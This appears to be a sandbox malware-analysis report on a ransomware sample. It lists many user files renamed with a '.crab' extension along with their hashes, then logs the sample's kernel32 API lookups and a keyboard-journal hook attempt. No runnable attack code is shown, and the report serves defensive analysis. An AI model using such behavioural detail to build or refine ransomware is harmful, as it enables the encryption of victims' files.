c:\users\ciihmnxmn6ps\documents\etzfzqcrh.pptx.crab 37.43 KB MD5: 7c985f666d4fc1397a025279d0acf9b9
SHA1: f228d17c07c9deca1552420809ba9e5bb91e2d2b
SHA256: 31e67a4639ddcd73545546d25cf81a269522a41c2f7e970042f33d78ed5a11cc 		False
...
c:\users\ciihmnxmn6ps\documents\fc_od01s2.pptx.crab 18.27 KB MD5: 0009c9aab6acf79cb5498c28650e51fd
SHA1: 41160672768ea8ec470ceac10ac700a7932e34fc
SHA256: 2ccffa68f0f0f322c64d282ff807a9800895684ea5213d649fbc1c58970b81ee 		False
...
c:\users\ciihmnxmn6ps\documents\h1z-06flhnhnlxtgjgt.docx.crab 27.68 KB MD5: 7a062c4bd812a88d30855c5bc3a02f7e
SHA1: 328d9c0a21c6691fd73e19ed97b61306b22491a1
SHA256: 9a8dcc2bff16a6eb6980f1f1a2b102cca229a661eaaabf015becad1b94117270 		False
...
c:\users\ciihmnxmn6ps\documents\i314akn7n.ppt.crab 34.55 KB MD5: 0f8ed0a8435cb3b8a2b4f8b0b5f95b2b
SHA1: 4b53c7e25238123d0afa2a1ad9f3bc8d66a5ee77
SHA256: 450802cb4624e2781ca8296cf01c48b269bf7a21b0fde92780da0216c01facab 		False
...
c:\users\ciihmnxmn6ps\documents\jonrt.pptx.crab 90.95 KB MD5: c8efda8a806ad8f22758af23b9b09d0c
SHA1: f9e5a8da55ec826bd520055c5c98dbad709b7597
SHA256: b3b64efb7a46317793db67a4e19c43ba6b84128e2512c218de1210584c0e34d3 		False
...
c:\users\ciihmnxmn6ps\documents\jrjrq_iskjxx7tzo0th.pptx.crab 51.02 KB MD5: 410c49babc739dfb3f95e45df1f97392
SHA1: 067f2cd663c1aa335027b58485ae46992bf8ab94
SHA256: ad75df75d0f2741468ea799e9c19364e513845154b2fca14e7f5b1ad44891af6 		False
...
c:\users\ciihmnxmn6ps\documents\lafhpztirt5nx9u_bra.docx.crab 84.99 KB MD5: 6dbc71da8765c95f34aedee0cb80ba4f
SHA1: 32765ba76044aff3add63031c262b452b91a27ae
SHA256: 049555b21a1db5edb14dd6112dbf3bd064763f3728f38f6559891d020b2a31ec 		False
...
c:\users\ciihmnxmn6ps\documents\lhv_p122.docx.crab 45.74 KB MD5: 0716cae4a5e988de740bdf927a55c754
SHA1: 892bdbd34a1b75eca99b7cd5eccaa7927e247458
SHA256: ccfc9e17e840bcb2c15c205186a34aac46cf2a2dfc821e29c07d080108933ffd 		False
...
c:\users\ciihmnxmn6ps\documents\o12g.xlsx.crab 47.10 KB MD5: 881f63abafc3454477ccfea553ef4fde
SHA1: a78786ea8e4f44bddd7a9b164a20a8f7bdfd4be5
SHA256: 582104e530a1a8fc2e38ac5f575ed53ea8b964b21941af13239216d989d93690 		False
...
c:\users\ciihmnxmn6ps\documents\ofzwp.ods.crab 43.43 KB MD5: e9b9f765dc4c066fc9268a631d2ccfe7
SHA1: 7b91f6e9eb1c4b83dfb6d8416902e9bb7491be46
SHA256: 29a3dcf3bc189d5c875757f3c81b800bfcdfad8655ddfa8ac6882c8983cde69d 		False
...
c:\users\ciihmnxmn6ps\documents\onenote notebooks\my notebook\open notebook.onetoc2.crab 6.55 KB MD5: 4744242794ab56ff01b882cfe366628e
SHA1: 395fc3233d37e237dd117266cf5c08a637d925f1
SHA256: 418fce8166216e3822925049ad8cf2ac112fee2a6b4287e345a470bcceaff65a 		False
...
c:\users\ciihmnxmn6ps\documents\onenote notebooks\my notebook\quick notes.one.crab 352.21 KB MD5: 4383de5de5bfdffe3710362d88c5b916
SHA1: 7949649c51ea9e0771f42c7b32fb0ecf995339bf
SHA256: b3b9d44a597da4621ef6099f3d69262185e5f5c8917cc9732a32f108d9705a97 		False
...
c:\users\ciihmnxmn6ps\documents\outlook files\lcfkj@kiekc.df.pst.crab 265.51 KB MD5: f995766b6bda4fced09cca6b90a44de9
SHA1: 3dfac4fc393ede88155ec284b0eceef93a0b639a
SHA256: f945da0ea7f46f612516534bc13b232da4fbfd1ddc6ab0dc2554ee5d1b56e0d9 		False
...
c:\users\ciihmnxmn6ps\documents\q0dqmwgv3n0jwrc.pptx.crab 71.52 KB MD5: 35dfcc255fc478d5690814bac28cd4e5
SHA1: 616d05ed83bfcaa7dcc74546091404d1585806d5
SHA256: 0a8efe7ae2edc2335d0ca768e7355ecc8715553dac669115d0b9b84fa036b78e 		False
...
c:\users\ciihmnxmn6ps\documents\r4ayckh3 sueugi3.docx.crab 32.18 KB MD5: 987619a7c3dbdf568836a86abdec4ac8
SHA1: 0cdb9ec19e3dba465fc77e8ea96a4734148e2157
SHA256: c6e9e7bde311452bf5cde67e77d9ab3ce92a5175529f4fae6ff0d8cdfafc474c 		False
...
c:\users\ciihmnxmn6ps\documents\rlafw9w.xlsx.crab 2.05 KB MD5: 1ccb1acbdbb897d25eb84da75bfe82ec
SHA1: 48130774ed47a58cd58860876a1065828d5eb472
SHA256: c81ea2d87e416836fb0100813de418155dfb8f6f5c6aff097d3025acc1882d60 		False
...
c:\users\ciihmnxmn6ps\documents\vdbz6lhl0d2m0rs6vlai.xlsx.crab 79.18 KB MD5: 28fd9eb0b2516a3e6f4eae8494e3020e
SHA1: 1d857d1c771da2876cbe4dc00d98a5a27e8edce3
SHA256: 2c3ba60833f3523612b666c9ca33a259c565a2999bec2e2aa7c7915b9158a625 		False
...
c:\users\ciihmnxmn6ps\documents\x01v32lt4hd6__.ppt.crab 14.46 KB MD5: bbfd8cce06c5c9dc125e2033eb6ea413
SHA1: 23d04d7de7d5dc546242e76b205fb2e7260e40ed
SHA256: b8a5d9c8a1d761bb2e25d795178ead1cac4d4a2ace17a4455e0ddb9835c51241 		False
...
c:\users\ciihmnxmn6ps\documents\y59i.xlsx.crab 81.59 KB MD5: 994136bbbe471e97e51299e4efd873fb
SHA1: 204c73fdeab65c7b5035c7b8a08324a2cb747a85
SHA256: 077eee14ae7d8bb6c0a1050b149221c192bf5f30ab70df298f6b7090bda43301 		False
...
c:\users\ciihmnxmn6ps\favorites\bing.url.crab 0.71 KB MD5: e13ac54fefd197c99e30c2132f2a53cb
SHA1: 7b2e405b62744e0de5210ca8714cc008bba51d9d
SHA256: 450e4ff10cc400da8e3dd342253afda5f8684791e6ca48dbed98eccee2a8784d 		False
...
c:\users\ciihmnxmn6ps\music\a6tw3a.m4a.crab 49.54 KB MD5: 5d8aa05bbcf4e59627c25bf74bcddad5
SHA1: 1f8eb275bafda9888d4874cf715de4c66d7936dc
SHA256: d58e62ef7182090711a64231e1ce874f4c0a52335a62cd2be922ddb182949897 		False
...
c:\users\ciihmnxmn6ps\music\lweys\a7wpa\j-ywcejqn_mfqyvgy4\hlxptujkbg6pddg_0.mp3.crab 90.59 KB MD5: 95ad43b9f7e7b0b92f3875fd7ef066d6
SHA1: 9f5b00d3b95cc46a4ecd565043963aa4808d7712
SHA256: 1530d41447e70ab7941823952e1dfad6fccca089f545da7927d93454285d570d 		False
...
c:\users\ciihmnxmn6ps\music\lweys\a7wpa\j-ywcejqn_mfqyvgy4\j9v0b7unl5ylpdod\0loiqtylkrf5phsyges.wav.crab 29.26 KB MD5: 8ac8687822017f588d8b29c748a9f6ee
SHA1: 36e3943e8cddc2a66819df017f0ddbd0fd92a0d6
SHA256: e2b5dae952c006b941fcd2d2e9a1a6ef50c83ea1eb739c3780a296b906b632c8 		False
...
c:\users\ciihmnxmn6ps\music\lweys\a7wpa\j-ywcejqn_mfqyvgy4\j9v0b7unl5ylpdod\4l5sdzc1s.mp3.crab 6.59 KB MD5: 7f4e2c73d15becc740ea916df736db03
SHA1: 1f01edb1c27d14be1bf685d27111437f42446940
SHA256: 72be31226602039bfd9c3495ecc02cbc3fbbff24f6bd5bcc680430cc8ac696f0 		False
...
c:\users\ciihmnxmn6ps\music\lweys\a7wpa\j-ywcejqn_mfqyvgy4\j9v0b7unl5ylpdod\ap8e0edr\iwcdy.mp3.crab 36.59 KB MD5: d4e519937a3d7e6aa84b40ddfd48e86f
SHA1: 52fc08f576fcf975a9b08335bffb77df43e3f345
SHA256: 61b541dafa3e2f019b603c1ef11b8070424eeb790926d9674e7b3143be50b880 		False
...
c:\users\ciihmnxmn6ps\music\lweys\a7wpa\j-ywcejqn_mfqyvgy4\j9v0b7unl5ylpdod\dorc\j c9slhgc70ws-tvhbw.m4a.crab 39.70 KB MD5: e2567ddec43a3a51c4de6f21a875a6b2
SHA1: 57614fc9b97800b68c400958755fa8fe910b44a4
SHA256: c6bc62f66f6264389b33454f5142c7c7019a5e3458c1ed12d65f5202fbb33135 		False
...
c:\users\ciihmnxmn6ps\music\lweys\a7wpa\j-ywcejqn_mfqyvgy4\j9v0b7unl5ylpdod\dorc\xjg8fvlkqbm41b.mp3.crab 67.93 KB MD5: a45ee539f555898ed8392cf9f26d5a8e
SHA1: 60806d44528b0ee240d8d063b567c5149660c2b7
SHA256: 4031a71be76fee9f9a09bc6c79e072d2ce193f86ba0ab6d05b1da501dafacf0f 		False
...
c:\users\ciihmnxmn6ps\music\lweys\a7wpa\j-ywcejqn_mfqyvgy4\j9v0b7unl5ylpdod\vn8dzjxa3\kixg5wayfwckazurlg.m4a.crab 87.93 KB MD5: 2560ba4818e3667a94dcb417aad03a26
SHA1: e7bbcabe5e38162c34bc3fafc8ad8f3fe27f3fdf
SHA256: a3754bbc12fbac7414809abbd1f01e2fde331a6e55b28f556197a5b1fff24f4e 		False
...
c:\users\ciihmnxmn6ps\music\lweys\a7wpa\j-ywcejqn_mfqyvgy4\lys1x.m4a.crab 24.51 KB MD5: d896f8565aa154d8f0e4cf2ccca644ef
SHA1: a57b519f07c37bb9418ad36d9e3bf1e3ca530bf9
SHA256: 3d244c339ddd90ae450f4561873b5f11b3b05a68da054d7da29d4aad00fe20c8 		False
...
c:\users\ciihmnxmn6ps\music\lweys\a7wpa\j-ywcejqn_mfqyvgy4\vbngdri4mrf--gtok.m4a.crab 61.57 KB MD5: 75a7b85b03bf590cc256ede223fee772
SHA1: 68adad09416891f316fb5a544869a3cfe2b24a56
SHA256: 7208233a4d09c64c238399bd8f22ef3c8455b8ca646cecc251de9612c9812516 		False
...
c:\users\ciihmnxmn6ps\music\lweys\a7wpa\j-ywcejqn_mfqyvgy4\zhuqb6w6cwfci3\2gjr7qe.m4a.crab 79.38 KB MD5: b72351f5479b8166e60661367236d702
SHA1: f6d03688ab5c3abf87ab7b6537c92e893f050be1
SHA256: 79a5efd615470f839ed0a7108ce72eed9edff9b5064e3f847ea236a06f545b5f 		False
...
c:\users\ciihmnxmn6ps\music\lweys\a7wpa\j-ywcejqn_mfqyvgy4\zhuqb6w6cwfci3\rmnortznudyt0d hpk\60cuywo5pw8tmgywf2.wav.crab 63.16 KB MD5: b20261c252c33396e728ecfc8cffb4fa
SHA1: 7162dfd860841b51d0bc1eca17c0082818531d9e
SHA256: 0374ad6f9e7e037d4f229b7e611926e7a8fdd8dca5418c782ebbbf5866c98e2f 		False
...
c:\users\ciihmnxmn6ps\music\lweys\a7wpa\j-ywcejqn_mfqyvgy4\zhuqb6w6cwfci3\rmnortznudyt0d hpk\a6zagl.wav.crab 11.84 KB MD5: 25a817e876cc94cda6cafa5369afc08c
SHA1: b95193b0f607b13e2899ebe1b9efa7f8f87df5e3
SHA256: 4ed5516a52f844754b199a17dec355e6a2a554a2a55a80ddc28d3203b9936279 		False
...
c:\users\ciihmnxmn6ps\music\lweys\a7wpa\j-ywcejqn_mfqyvgy4\zhuqb6w6cwfci3\rmnortznudyt0d hpk\ql53ixtpxf.mp3.crab 65.91 KB MD5: 5a38614b9e9a16144f182991fd890008
SHA1: 8e904a8b3419a54f74fe992fe8a17df7866345d0
SHA256: 33c5ec5fe2b94b26ec1a1aaf75078d05f958dbce139b5ffda5a1b4d90e445e51 		False
...
c:\users\ciihmnxmn6ps\music\lweys\kiu5nzbzqgaldxrejj.mp3.crab 56.02 KB MD5: abaf0c90203da9f4d2644aefe047ae9b
SHA1: 46abc4cda8b5fd5923c8ad24ff58dc682a447fcb
SHA256: b7fd80007adf10e6cf58a1630c762c0089b5809d922b059d7db01dae1da8b708 		False
...
c:\users\ciihmnxmn6ps\music\lweys\nadec5y4s_hmy2rk.wav.crab 40.18 KB MD5: 47bf394bfe1ed950fff017aeaa0155fa
SHA1: a4d48b436ca79e6b404c806830a394b42db40b5a
SHA256: 09054498d009fdc8ff2b7bbf52b73c213838ccb4eca48be8017c84f2c3fa3de0 		False
...
c:\users\ciihmnxmn6ps\music\lweys\o-dhuzubcwg.m4a.crab 14.82 KB MD5: c9953ac463aca013c9d9ea03aab46b27
SHA1: 745b8fd2e4ae458b84759713b27f54e60548650c
SHA256: 3191dd7349b20f89d5e98c6ba186720c8c625ad07f4bad1c709a9cda5edd1c02 		False
...
c:\users\ciihmnxmn6ps\music\ostz2ccmt18\5mbi2yi46b5mybjnr896.wav.crab 32.55 KB MD5: de25aed036c2a887342e1f42899d03a1
SHA1: 3aefbbe5c30dce8daa780da16b942262e63b32c9
SHA256: db1fa8cf42f08db9f37b1df9e465f1513481debfdbb790768e730fff95b34c3f 		False
...
c:\users\ciihmnxmn6ps\music\ostz2ccmt18\hkrqlcpm0hjag.mp3.crab 2.43 KB MD5: b1ca69338f53e4926e07f23b0889d1a5
SHA1: 62929d952c176e40db2769dcb5c34380179ada3f
SHA256: a9bf63ccf65a5e1ffcfafd2e6426194ed261e1028cd3042cb7cbdecc20e608f0 		False
...
c:\users\ciihmnxmn6ps\music\ostz2ccmt18\jdlkjg.mp3.crab 87.41 KB MD5: aab454f1366d68b1a1370f29c1b7a361
SHA1: 7ebf4a9afce244d9aa618e661a7a275c20599953
SHA256: c4d4dad6ecec9cdc4f5741d911ffa7bfb902e920ca1c7937b79dfa80f7b19ad7 		False
...
c:\users\ciihmnxmn6ps\music\ostz2ccmt18\ktizwaokioo4iuk.wav.crab 59.85 KB MD5: 6da049fb7413503bd986b1b256514419
SHA1: 63b81d88797eee43aec362251bf36020d3d17389
SHA256: 72c89bcb27145514c71a148cc0b5e52111a31fcad419b5386107fabb6b1918f6 		False
...
c:\users\ciihmnxmn6ps\music\ostz2ccmt18\pcpsiclg7.wav.crab 64.32 KB MD5: 3ff63a12b6441ac5d517fa6ba82801b2
SHA1: 6459e2a6496ae23e48443da9d69bd7a890ba436a
SHA256: 2a72867aa35122ede76775278db8e3418f02f6e06f12f89eca3bee92e6c5876e 		False
...
c:\users\ciihmnxmn6ps\music\ostz2ccmt18\xkfde96f.m4a.crab 21.90 KB MD5: e24ff9abb54a44793231168ccaada828
SHA1: 940bf9b71acdd6d5cf0d91f45bc3cc2bbb1f5d44
SHA256: a5e5b258d538d8c00fc70b81a734182a5be9e889fc259048ecf316f2e5f6bfee 		False
...
c:\users\ciihmnxmn6ps\music\x6uo.m4a.crab 25.24 KB MD5: e3a8f6899dde5f4127610af8127fd28c
SHA1: e4a522445407d9e591166e44786c8437e811025e
SHA256: 2f1d45b151739b8c06b64215e4ed4edbe125f5a4371ffb693596240d53a4a482 		False
...
c:\users\ciihmnxmn6ps\music\xid8w1q.m4a.crab 7.68 KB MD5: 6aa971e35606d6e75e26918d4db13364
SHA1: 7f4e80e3a1b2536b63bb34633cbde76a4ab0c244
SHA256: 05d25d5d9f7c29f84ccc6d6885ad5c9d37063ddc509a0352ad72384aa02d2166 		False
...
c:\users\ciihmnxmn6ps\ntuser.ini.crab 0.54 KB MD5: b1a565c8738cf2fbe622c500b6848712
SHA1: 724a4ca9274669c707336187f5a6dc348ffadb52
SHA256: a95cac02997387729d49bec8b49ac8252206251af11731219cb7b3183888efca 		False
...
c:\users\ciihmnxmn6ps\pictures\-j01e.png.crab 81.54 KB MD5: 72a529b80894db018cc173fb1a547cb5
SHA1: 0cc99ad170cdeb24ba29dc89d613e6791cdabff3
SHA256: 3f2de6f1b060b6431f6336e1d5f5a4088d28b2a4ba204be77d1f4f936d24471a 		False
...
c:\users\ciihmnxmn6ps\pictures\9pppzstskzas9wuijii.gif.crab 67.62 KB MD5: 925b7659ac5454e8fb5f6fba6defee7e
SHA1: da212090f6dd338f9d35c83626efc391aaddee3b
SHA256: 1ccf11da7170051f5852d1ccf44cf7b0827ed094a0ecda74511010f66ec9ff46 		False
...
c:\users\ciihmnxmn6ps\pictures\b8-mos8\9iznyz2x_fm7f.gif.crab 99.35 KB MD5: e2096788888bfe6667aed23ca6490955
SHA1: f236fc36805242902ea212ce5157fd6053022691
SHA256: 7e74ffe93e0a0ac6d1fa7a9b124af4c6f1e1f3ec58bb5a207d360cf809fa2193 		False
...
c:\users\ciihmnxmn6ps\pictures\b8-mos8\jpo gdnh_9seqq.bmp.crab 11.34 KB MD5: 0dbaec58aa441987f86f985146a007ab
SHA1: f08e37ac71eaa34ae86b1aef775b024adf2a2907
SHA256: 513e9f3e4e82e8d192f3d9c689e69b9814353aa9671160bdb93ca8e61e3458a6 		False
...
c:\users\ciihmnxmn6ps\pictures\b8-mos8\lhhikj83qa.gif.crab 97.37 KB MD5: afb54655f03bf39af70fe602fe2c3148
SHA1: b9ad5736693c6a17ebf893ba5928b43ee8082ac7
SHA256: fab955dbcab5d55099334e2b5993ad13f21c65bade2710c0ed7d4272b48344b4 		False
...
c:\users\ciihmnxmn6ps\pictures\b8-mos8\lxzbp3.jpg.crab 25.38 KB MD5: 198c7af652a7fd99295272214374ff83
SHA1: 4a587e1eb41c243e91f12557451a4c3a6f2412e7
SHA256: 8488e91b5ba36b58af14cf57050a589a75d24fe352f11d25643daed0e136207c 		False
...
c:\users\ciihmnxmn6ps\pictures\b8-mos8\opc2yyt8fbscgp\5e0evkq.gif.crab 50.60 KB MD5: 78011882d3ecf3945c8c1651dff9e74b
SHA1: e290ba1a5531a1de1000247ea2f80a0519dd1763
SHA256: 495a81bd17220f85f736943e2995c79ad9dfcde975da32a2e8aedf9a7b58e28a 		False
...
c:\users\ciihmnxmn6ps\pictures\b8-mos8\opc2yyt8fbscgp\6oul8ot9v_3ym1.bmp.crab 85.60 KB MD5: 2c499c60bb2dda7692e574652e495647
SHA1: a8f6556db9eba10ebfe5c05c3ff8d491020181e8
SHA256: 504e3425f62df559247bf3d727a379e40135fdbc86b82a1a97d2022ebecb06d7 		False
...
c:\users\ciihmnxmn6ps\pictures\b8-mos8\opc2yyt8fbscgp\hr6cfuhcx0u07gqrmqst.gif.crab 67.54 KB MD5: 3b76ecc6bb731dcf1e7c8809f29e8e4a
SHA1: f44f23071dd3f575a2f365ca72ecce17ecacbe68
SHA256: 2f61a1369d3e1a3f86b05b10fdfc60b2b6f6a1acffa00b87f6d366cefda89fb7 		False
...
c:\users\ciihmnxmn6ps\pictures\b8-mos8\opc2yyt8fbscgp\mkg9no.png.crab 97.52 KB MD5: af967e07f9a35a14ace41d0632105157
SHA1: 63a7cb52ee87c833d104267abf42b6c89f21a798
SHA256: 50a78b2dc65ef3fba48cb993b0aebae5add7088dd78dfffed45fc3c7439b1d9a 		False
...
c:\users\ciihmnxmn6ps\pictures\b8-mos8\opc2yyt8fbscgp\pnzhgf.png.crab 55.41 KB MD5: 1751e6c399e841d49aa410417e9ae7e5
SHA1: ef981c50209d9ed1d8d955d2ab0adf3e0cf888bf
SHA256: eb779ed375c7c7d861c8b745472e0bfe63aff2bce58233f2349ce886ce9cd70e 		False
...
c:\users\ciihmnxmn6ps\pictures\b8-mos8\opc2yyt8fbscgp\pykjt82k9znachsv0kr.jpg.crab 4.63 KB MD5: 98335c7a242938e44483685bc2ff17e4
SHA1: 967e936bc72505b1709402d6b359a74299cd2ce4
SHA256: 05c4544bf6a9e556af95cac998b69f8e667283f53c5bc25aeea2ff407234dc7c 		False
...
c:\users\ciihmnxmn6ps\pictures\b8-mos8\opc2yyt8fbscgp\vi_ta6yt_tksm1g.png.crab 16.46 KB MD5: 0eab4e68f9ed8072f1d5b7c7031e828f
SHA1: 8a9db767af23940ba5f03e15e251705f684a37d1
SHA256: 1978c3602d98a7e919fec65dc0af5ebc2599319b298ea3257652a33070ae650a 		False
...
c:\users\ciihmnxmn6ps\pictures\b8-mos8\opc2yyt8fbscgp\w3rn5kb2s.gif.crab 5.60 KB MD5: afe87c13862517ee20b3e76a2a34b340
SHA1: 48c4bbb0412f472060e2abc5c01379079f68d880
SHA256: 92ee1201777ab68ecbcc8fe90b0419fcb2cc83003155388819fe0427e281e7a4 		False
...
c:\users\ciihmnxmn6ps\pictures\b8-mos8\opc2yyt8fbscgp\wu_m0yiyg.jpg.crab 62.35 KB MD5: f2fa186ec57350e2421807767c8fc00a
SHA1: 829f54981c6a2812b2b70d360f8cb2d82d9e90fa
SHA256: ccff16ade31ed4535a4ca28c67b1f3795134c3969ff5784946363fe062854135 		False
...
c:\users\ciihmnxmn6ps\pictures\b8-mos8\opc2yyt8fbscgp\y2-ydweohdoske7qrimg.png.crab 61.24 KB MD5: 7a45d89eeb3c87331bb1eaf5cf832899
SHA1: af7ec7a9737ee3fa0a10d44ca80f3da0f3177980
SHA256: 89949ee7dc5b59533739d1e4fe49f7362ef5391be8a3a2bc361c329b11ac72be 		False
...
c:\users\ciihmnxmn6ps\pictures\b8-mos8\st msx.jpg.crab 32.57 KB MD5: c0f2747a17c5a1a464b393237e708e30
SHA1: 8a37359dbd909617a3d7dd76fac30045a6c8d002
SHA256: 4262e8cc484558cbe12a102b8f3dbc4fa32ba7927fce9e7956fa819cbf9b9bd6 		False
...
c:\users\ciihmnxmn6ps\pictures\b8-mos8\tdcwadspf52etbumtu x.bmp.crab 5.23 KB MD5: 9021c382d0ecb98b885bdc039ad18a5c
SHA1: e10ae2a67e0bef10d32ebb83d072ad14f60d4700
SHA256: 32b555cc1c751fcba5fd776e003fd092fd23357f0e55ed50c673689f40a8379b 		False
...
c:\users\ciihmnxmn6ps\pictures\b8-mos8\u2lb7_.bmp.crab 83.27 KB MD5: 31811affde8a44e33ce1f6f5c75d130f
SHA1: e289760a57840edd257bc7d5ce49c0a135e9d0e0
SHA256: a8038e1624074e912a20d5e30ddc70f9b80e910c22cb8fcc1c36215d6948df5c 		False
...
c:\users\ciihmnxmn6ps\pictures\b8-mos8\v5zl9wl.gif.crab 59.24 KB MD5: 4df9f3ba5577040c012639d569f8b85d
SHA1: cc9f4d8749a9a80619c69bcc55db6e6e9da23941
SHA256: 015b4732eee19f3505db84b870a83afa2a1547c3d0fb6bdd7a4019a436354903 		False
...
Threads
Thread 0xefc
364 0
»
Category Operation Information Success Count Logfile
Module Get Handle module_name = c:\windows\syswow64\kernel32.dll, base_address = 0x77670000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = FlsAlloc, address_out = 0x7768a330 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = FlsGetValue, address_out = 0x77687580 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = FlsSetValue, address_out = 0x77689910 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = FlsFree, address_out = 0x7768f400 True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\kernel32.dll, base_address = 0x77670000 True 1
Fn
File Open filename = STD_INPUT_HANDLE True 1
Fn
File Open filename = STD_OUTPUT_HANDLE True 1
Fn
File Open filename = STD_ERROR_HANDLE True 1
Fn
Environment Get Environment String - True 1
Fn
Data
Module Get Filename process_name = c:\users\ciihmnxmn6ps\desktop\2018-05-22_13-47-32.exe, file_name_orig = C:\Users\CIiHmnxMn6Ps\Desktop\2018-05-22_13-47-32.exe, size = 260 True 1
Fn
Module Load module_name = kernel32.dll, base_address = 0x77670000 True 1
Fn
System Register Hook type = WH_JOURNALRECORD, hookproc_address = 0x0 False 249
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = LoadLibraryA, address_out = 0x7768d8d0 True 1
Fn
Module Load module_name = kernel32.dll, base_address = 0x77670000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = VirtualAlloc, address_out = 0x77688b70 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = VirtualProtect, address_out = 0x77688c50 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = VirtualFree, address_out = 0x77688c70 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetVersionExA, address_out = 0x77689fe0 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = TerminateProcess, address_out = 0x7768fbc0 True 1
Fn
System Get Info type = Operating System True 1
Fn
Module Load module_name = KERNEL32.dll, base_address = 0x77670000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetCurrentProcess, address_out = 0x77682da0 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = WaitForSingleObject, address_out = 0x77696110 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = OpenProcess, address_out = 0x776892b0 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = Sleep, address_out = 0x776877b0 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetModuleFileNameW, address_out = 0x77689560 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = CreateFileW, address_out = 0x77696180 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = ExitThread, address_out = 0x77ca2570 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetLastError, address_out = 0x77682db0 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetProcAddress, address_out = 0x77687940 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = ExitProcess, address_out = 0x776974f0 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetModuleHandleA, address_out = 0x77689640 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = CloseHandle, address_out = 0x77695f20 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetCurrentProcessId, address_out = 0x77681d90 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetVersionExW, address_out = 0x7768a2a0 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = LoadLibraryA, address_out = 0x7768d8d0 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = lstrlenW, address_out = 0x77682d80 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = TerminateThread, address_out = 0x7768fcb0 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = CreateThread, address_out = 0x77689700 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = WriteConsoleW, address_out = 0x77696920 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = SetFilePointerEx, address_out = 0x77696540 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = VirtualProtect, address_out = 0x77688c50 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = IsWow64Process, address_out = 0x776896e0 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = SetStdHandle, address_out = 0x776b26a0 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetConsoleMode, address_out = 0x77696870 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetConsoleCP, address_out = 0x77696860 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = FlushFileBuffers, address_out = 0x776962a0 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetCommandLineA, address_out = 0x7768a3c0 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = SetLastError, address_out = 0x77682af0 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetCurrentThreadId, address_out = 0x77681b90 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = EncodePointer, address_out = 0x77c9f190 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = DecodePointer, address_out = 0x77c9a200 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetModuleHandleExW, address_out = 0x77689fa0 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = MultiByteToWideChar, address_out = 0x77682d60 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = WideCharToMultiByte, address_out = 0x776875a0 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetProcessHeap, address_out = 0x77687910 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetStdHandle, address_out = 0x7768a060 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetFileType, address_out = 0x77696390 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = DeleteCriticalSection, address_out = 0x77c99920 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetStartupInfoW, address_out = 0x7768a080 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetModuleFileNameA, address_out = 0x7768a040 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = WriteFile, address_out = 0x77696590 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = QueryPerformanceCounter, address_out = 0x77682dc0 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetSystemTimeAsFileTime, address_out = 0x77682b90 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetEnvironmentStringsW, address_out = 0x7768a3b0 True 1
Fn
